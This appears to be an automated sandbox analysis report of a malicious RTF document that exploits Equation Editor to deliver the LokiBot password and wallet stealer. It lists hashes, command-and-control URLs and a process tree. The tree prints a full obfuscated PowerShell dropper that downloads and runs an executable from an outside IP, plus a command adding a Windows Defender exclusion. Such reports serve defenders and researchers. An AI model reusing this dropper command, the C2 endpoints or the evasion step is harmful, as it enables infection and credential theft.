Analysis

  • max time kernel
    102s
  • max time network
    106s
  • platform
    windows7_x64
  • resource
    win7-20241010-en
  • resource tags

    arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system
  • submitted
    20-11-2024 10:10

General

  • Target

    seemybestoptionforentiretimegivenmebackwith______suchagreatthignswithentiretimewithmegood______seeth.rtf

  • Size

    251KB

  • MD5

    e6859034a42f217800b6bf0980e93848

  • SHA1

    8dcb69dcf727b7a7fbfbf6755492990dc51fd192

  • SHA256

    564a4e9044bd96c3c67ae4c596664a2d9a7ecd1962872ac836e051949fb109b1

  • SHA512

    778ceefc76571268a7c82c18ec1b6f6661b4f696d2612528b8eb94488383c84c9dba6613cd5b1c715514e64d062d73d28d84395f30dadb4fd2da51cbac372d35

  • SSDEEP

    3072:sUcN1DaxXp1sAkC5gCQqCv7L5FokmFJcmrmR3D:slruZ1sA55gCQBL5FokmFyCmR3D

Malware Config

Extracted

Family

lokibot

C2

http://94.156.177.41/maxzi/five/fre.php

http://kbfvzoboss.bid/alien/fre.php

http://alphastand.trade/alien/fre.php

http://alphastand.win/alien/fre.php

http://alphastand.top/alien/fre.php

Signatures

  • Lokibot

    Lokibot is a Password and CryptoCoin Wallet Stealer.

  • Lokibot family
  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Downloads MZ/PE file
  • Evasion via Device Credential Deployment 2 IoCs
  • Executes dropped EXE 3 IoCs
  • Loads dropped DLL 3 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
  • Drops file in System32 directory 3 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 9 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Office loads VBA resources, possible macro or embedded object present
  • Launches Equation Editor 1 TTPs 1 IoCs

    Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.

  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 46 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\seemybestoptionforentiretimegivenmebackwith______suchagreatthignswithentiretimewithmegood______seeth.rtf"
    1⤵
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1680
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:2356
    • C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
      "C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
      1⤵
      • Blocklisted process makes network request
      • System Location Discovery: System Language Discovery
      • Launches Equation Editor
      • Suspicious use of WriteProcessMemory
      PID:2824
      • C:\Windows\SysWOW64\mshta.exe
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\goodtoseeuthatgreatthingswithentirethingsgreatf.hta"
        2⤵
        • System Location Discovery: System Language Discovery
        • Modifies Internet Explorer settings
        • Suspicious use of WriteProcessMemory
        PID:2880
        • C:\Windows\SysWOW64\WINDOwSPOWershELL\V1.0\poWERShell.eXe
          "C:\Windows\SYSTEm32\WINDOwSPOWershELL\V1.0\poWERShell.eXe" "poWershELl.ExE -eX bypAss -nOP -W 1 -C deViCEcrEDEntiALdEplOYmeNt ; InvOKe-EXpreSSion($(iNvoke-EXpreSSIoN('[sYStem.TExT.eNcoDiNg]'+[CHar]0x3A+[chAr]58+'Utf8.gETsTriNg([systEm.coNvErT]'+[ChAR]0X3a+[CHAr]58+'fRoMbaSE64sTRinG('+[ChaR]0x22+'JGozckggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELXR5UEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVtYmVyZGVGSW5pVElPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1UkxNb04uRGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTE9ETWxJWUZIRixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBlTyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMcmQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtDTXYsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc0t3aFNVZ0ZkKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiUEtKbWRxIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMWVBocGZaVmggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGozckg6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly82Ni42My4xODcuMjMxLzMzL2Nhc3BvbC5leGUiLCIkRU52OkFQUERBVEFcd2luaW5pdC5leGUiLDAsMCk7U1RBUlQtU2xFRVAoMyk7aUV4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTnY6QVBQREFUQVx3aW5pbml0LmV4ZSI='+[CHAR]0x22+'))')))"
          3⤵
          • Blocklisted process makes network request
          • Evasion via Device Credential Deployment
          • Loads dropped DLL
          • Drops file in System32 directory
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2500
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX bypAss -nOP -W 1 -C deViCEcrEDEntiALdEplOYmeNt
            4⤵
            • Evasion via Device Credential Deployment
            • Drops file in System32 directory
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1056
          • C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
            "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\klunhxwy.cmdline"
            4⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:2184
            • C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
              C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES74F2.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC74F1.tmp"
              5⤵
              • System Location Discovery: System Language Discovery
              PID:2364
          • C:\Users\Admin\AppData\Roaming\wininit.exe
            "C:\Users\Admin\AppData\Roaming\wininit.exe"
            4⤵
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:2700
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\wininit.exe"
              5⤵
              • Command and Scripting Interpreter: PowerShell
              • Drops file in System32 directory
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:1804
            • C:\Users\Admin\AppData\Roaming\wininit.exe
              "C:\Users\Admin\AppData\Roaming\wininit.exe"
              5⤵
              • Executes dropped EXE
              PID:1420
            • C:\Users\Admin\AppData\Roaming\wininit.exe
              "C:\Users\Admin\AppData\Roaming\wininit.exe"
              5⤵
              • Executes dropped EXE
              • Accesses Microsoft Outlook profiles
              • Suspicious use of AdjustPrivilegeToken
              • outlook_office_path
              • outlook_win_path
              PID:1984

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\RES74F2.tmp

      Filesize

      1KB

      MD5

      89305fdda65d73947f803c5d5d091a4f

      SHA1

      482b23036f9eb4e66406aaeb180f4945df9878d9

      SHA256

      ded8bef05d8c334bd02025f80341eabd6412c416bd1870d70376e2e1697378dc

      SHA512

      55b17c46355203dd6668462bf0107a86316639ababe8c0823dba116982ac2cb76051ebf6bd97229be81c1ef30c599c0f1289d00d444f24d1dcf1bdb943f27308

    • C:\Users\Admin\AppData\Local\Temp\klunhxwy.dll

      Filesize

      3KB

      MD5

      2199d8595aaf1be3e737f6802a96e1bc

      SHA1

      2e35254a31b08f01a6387b58fc1da40f32db4672

      SHA256

      966a05290311a4663d1fd0f1c133f2b0d85ba86a3f2cf4b2223658e50968febf

      SHA512

      c1077ca4743c2978ce33051d5edee78563c72e1444f59353d3208edc3ef635ffa1369d040e630b91baa7fe4350ca33bec6ee551a7314ff283a789561144107f6

    • C:\Users\Admin\AppData\Local\Temp\klunhxwy.pdb

      Filesize

      7KB

      MD5

      85abcf4e5bbbc4c60ddd892a8362f94d

      SHA1

      dd80d4f21e9ae6177369d12aa2166c279fdd3c76

      SHA256

      95cd0f5128a760c6b211966bfd4cce1ccdb8e6c22cfb663deb81ba89c3f291cf

      SHA512

      ebd6fd66355b0e1afb20f6f4c8f5ac88a082febdbc822c35817811bfbed23ce93a82b93c99e26cd2f9e605e7878332b7e8d0bd74c807e9a25d87de7d50bde9f9

    • C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3692679935-4019334568-335155002-1000\0f5007522459c86e95ffcc62f32308f1_6110149a-fcf0-442a-a749-601093ba4822

      Filesize

      46B

      MD5

      d898504a722bff1524134c6ab6a5eaa5

      SHA1

      e0fdc90c2ca2a0219c99d2758e68c18875a3e11e

      SHA256

      878f32f76b159494f5a39f9321616c6068cdb82e88df89bcc739bbc1ea78e1f9

      SHA512

      26a4398bffb0c0aef9a6ec53cd3367a2d0abf2f70097f711bbbf1e9e32fd9f1a72121691bb6a39eeb55d596edd527934e541b4defb3b1426b1d1a6429804dc61

    • C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3692679935-4019334568-335155002-1000\0f5007522459c86e95ffcc62f32308f1_6110149a-fcf0-442a-a749-601093ba4822

      Filesize

      46B

      MD5

      c07225d4e7d01d31042965f048728a0a

      SHA1

      69d70b340fd9f44c89adb9a2278df84faa9906b7

      SHA256

      8c136c7ae08020ad16fd1928e36ad335ddef8b85906d66b712fff049aa57dc9a

      SHA512

      23d3cea738e1abf561320847c39dadc8b5794d7bd8761b0457956f827a17ad2556118b909a3e6929db79980ccf156a6f58ac823cf88329e62417d2807b34b64b

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

      Filesize

      7KB

      MD5

      c04f3c41985cc013413eaf2ceecf6a56

      SHA1

      ccfb117f414652e7d86e4fa5621e963780007e2e

      SHA256

      ee56fedc94cd68206a7f3bdb6b79f94f330526a5619325692cd56efcb859ea46

      SHA512

      71c79fa4f6c7ccb829c44c6a504be4922ac7eed6cbbf06ad99a072f3ad60df687f918c3837b13775b0348fbae0006694ed88bf246fb7a10895614c2018491623

    • C:\Users\Admin\AppData\Roaming\goodtoseeuthatgreatthingswithentirethingsgreatf.hta

      Filesize

      23KB

      MD5

      ec0d423a3f72d69975a1e31a275f5377

      SHA1

      213922fb8456ecaadc24889afec1ac6ef5010c68

      SHA256

      9fd433cd543ab161d2a3ccb96a265c79ee0bb1a513647c0c33c72114660c64ac

      SHA512

      8132f567abfd4e3489204d1f3a9fc8292457ce10495345cd0ccfa8074233411c8305c4d73078a7dee02b086fbc22b8ad7047dd4bc127de337d0800771edf53ad

    • \??\c:\Users\Admin\AppData\Local\Temp\CSC74F1.tmp

      Filesize

      652B

      MD5

      999c87e859de2b9b8b054d93932f84ac

      SHA1

      2271f2cd0b04f2c4c939246e09c73f6464e4d571

      SHA256

      b6c08100f15e6f8599dc10f196b3fd2d1dee3d6e6cf79f6d18f26097e1f1e8a3

      SHA512

      d0f88c16fc5100440eff04be383fceb1c3118288275022e35a0cb8058898cdc56b0751aa571374ea2054c03af63a73d8fb4fb70406675023c300760ef8cead2e

    • \??\c:\Users\Admin\AppData\Local\Temp\klunhxwy.0.cs

      Filesize

      480B

      MD5

      b0517586f4097114e790c61f2685f0d5

      SHA1

      20f7482298ab96731228ebd5242ceddfd72ff50f

      SHA256

      a738e3af6f29edd637630b0299f306056042ea1c73850eee95498499f5d90237

      SHA512

      c28702017ce7fe0d34bea38cef48df3bb65c63d92dddd6f8264f7262f7ae61b8d71bcd6fec06d0792373d15ba84fb2a1d0c26b0fe5755bc20505a9197d654ba0

    • \??\c:\Users\Admin\AppData\Local\Temp\klunhxwy.cmdline

      Filesize

      309B

      MD5

      c92670f3725404e64b76b8d9980423fc

      SHA1

      5d13b67ece4a024ab25fb99b91c22606c1a7e19d

      SHA256

      377d8c2b51a5cb5db8089cb24d224dbbeb8c5948d489ecd216f4735b40156c29

      SHA512

      5f4989b0e1280eefcb58a10a83fd009cedde8b91d0d98e47f28f53b0bf0475e567544736a8f65cdfebb1b643bfeba938781539fd37226488c8b2748b4c01b072

    • \Users\Admin\AppData\Roaming\wininit.exe

      Filesize

      586KB

      MD5

      66b03d1aff27d81e62b53fc108806211

      SHA1

      2557ec8b32d0b42cac9cabde199d31c5d4e40041

      SHA256

      59586e753c54629f428a6b880f6aff09f67af0ace76823af3627dda2281532e4

      SHA512

      9f8ef3dd8c482debb535b1e7c9155e4ab33a04f8c4f31ade9e70adbd5598362033785438d5d60c536a801e134e09fcd1bc80fc7aed2d167af7f531a81f12e43d

    • memory/1680-0-0x000000002F271000-0x000000002F272000-memory.dmp

      Filesize

      4KB

    • memory/1680-51-0x0000000070B3D000-0x0000000070B48000-memory.dmp

      Filesize

      44KB

    • memory/1680-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/1680-2-0x0000000070B3D000-0x0000000070B48000-memory.dmp

      Filesize

      44KB

    • memory/1984-62-0x0000000000400000-0x00000000004A2000-memory.dmp

      Filesize

      648KB

    • memory/1984-69-0x0000000000400000-0x00000000004A2000-memory.dmp

      Filesize

      648KB

    • memory/1984-67-0x0000000000400000-0x00000000004A2000-memory.dmp

      Filesize

      648KB

    • memory/1984-66-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

      Filesize

      4KB

    • memory/1984-64-0x0000000000400000-0x00000000004A2000-memory.dmp

      Filesize

      648KB

    • memory/1984-56-0x0000000000400000-0x00000000004A2000-memory.dmp

      Filesize

      648KB

    • memory/1984-60-0x0000000000400000-0x00000000004A2000-memory.dmp

      Filesize

      648KB

    • memory/1984-58-0x0000000000400000-0x00000000004A2000-memory.dmp

      Filesize

      648KB

    • memory/1984-94-0x0000000000400000-0x00000000004A2000-memory.dmp

      Filesize

      648KB

    • memory/1984-103-0x0000000000400000-0x00000000004A2000-memory.dmp

      Filesize

      648KB

    • memory/2700-54-0x0000000005150000-0x00000000051B4000-memory.dmp

      Filesize

      400KB

    • memory/2700-53-0x00000000003A0000-0x00000000003B2000-memory.dmp

      Filesize

      72KB

    • memory/2700-52-0x0000000000100000-0x0000000000198000-memory.dmp

      Filesize

      608KB